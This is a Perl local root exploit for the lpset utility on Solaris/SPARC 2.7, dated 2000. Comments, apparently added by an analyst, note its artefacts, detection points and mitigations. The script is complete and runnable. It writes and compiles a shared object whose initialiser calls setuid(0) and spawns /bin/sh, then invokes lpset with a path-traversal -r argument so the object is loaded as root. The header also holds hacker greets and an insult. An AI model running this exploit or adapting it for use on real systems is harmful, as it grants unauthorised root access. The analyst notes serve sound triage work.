#!/usr/bin/perl
#
# lpset Solaris/SPARC 2.7 local root exploit 
# script by slash / buffer0verfl0w security 
# <tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl>
#
# "lpset seems to use strcat to append paths (-r) 
# but there is a special case when /usr/lib/print/lib has to
# be present." -n0ir 
#
# The shellscript that n0ir coded didn't work for me so
# I kinda ported his exploit to perl and now it werks :)
# Propz to him for the initial version of the exploit.
# 
# Greets go to b0f, TESO, zsh, mdma, funkySh, s0ftpj,
# lcamtuf, Lam3rZ, Mixter, all the polish people coz
# they rock :)
#
# Fuck you to: p4riah, h0lmez

# Flat proof-of-concept script with four stages: print a banner, write a small
# C source file, build it into a shared object, then run /usr/bin/lpset with a
# crafted -r argument. The notes below are for analysts triaging this sample.
#
# Artefacts and observables visible in this listing:
#   - boomshell.c and boomshell.o are created in the working directory and then
#     deleted; boomshell.so is left behind with mode 755.
#   - gcc and ld are run by the invoking user, followed by lpset.
#   - the lpset command line carries "-n xfn" and a -r value containing a run
#     of "../" components.
#   - if the object were loaded, /bin/sh would be expected as a child of the
#     lpset process (inferred from the payload, not shown running here).
#
# Mitigation: the header describes this as a local root issue in lpset on
# Solaris/SPARC 2.7; no patch identifier is given on this page. The usual
# options are the vendor fix for lpset, or clearing the set-uid bit on
# /usr/bin/lpset where unprivileged users do not need it
# (NOTE(review): presumably lpset is installed set-uid root - confirm).

# Banner only; no effect on the host.
print "Exploit the vulnerability in lpset Solaris/SPARC 2.7 \n";
print "Coded by slash / buffer0verfl0w security \n";
print "<tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl> \n";
print "Initial exploit version by n0ir \n";

print "Creating boomshell...\n";
# Two-argument open with a bareword handle; truncates/creates boomshell.c in
# the current working directory.
open O, ">boomshell.c" or die "open(boomshell.c..)";
# The heredoc body is written verbatim (it contains nothing Perl would
# interpolate). It defines _init(), the conventional shared-object initialiser,
# which calls setuid(0) and then system("/bin/sh"). setuid(0) only succeeds in
# a process that already has root privilege.
print O<<_EOF_;
#include <stdlib.h>
#include <unistd.h>
void
_init(void)
{
        setuid(0);
        system("/bin/sh");
}
_EOF_
close O;

print "Compiling boomshell ...\n";
# Backticks are used only for their side effects: output and exit status are
# discarded, so a failed compile or link goes unnoticed by the script.
# gcc produces position-independent boomshell.o; ld -G links it into
# boomshell.so.
`gcc -fPIC -c boomshell.c -g -DSOLARIS -Wall`;
`ld -G -o boomshell.so boomshell.o -ldl`;

# Make the shared object world-readable/executable and remove the build
# intermediates; only boomshell.so remains on disk afterwards.
system("chmod 755 boomshell.so");
system("rm -f boomshell.c");
system("rm -f boomshell.o");

# Single-string system() goes through the shell. The -r value starts with
# "/../../../.." and ends in "boomshell"; per the header's quoted note, lpset
# appends the -r path with strcat, which is the behaviour this argument
# targets. This command line is the primary detection point for the sample.
system("/usr/bin/lpset -n xfn -r /../../../..$PWD/boomshell boomshell");

# EOF
#                   www.hack.co.za   [6 September 2000]#
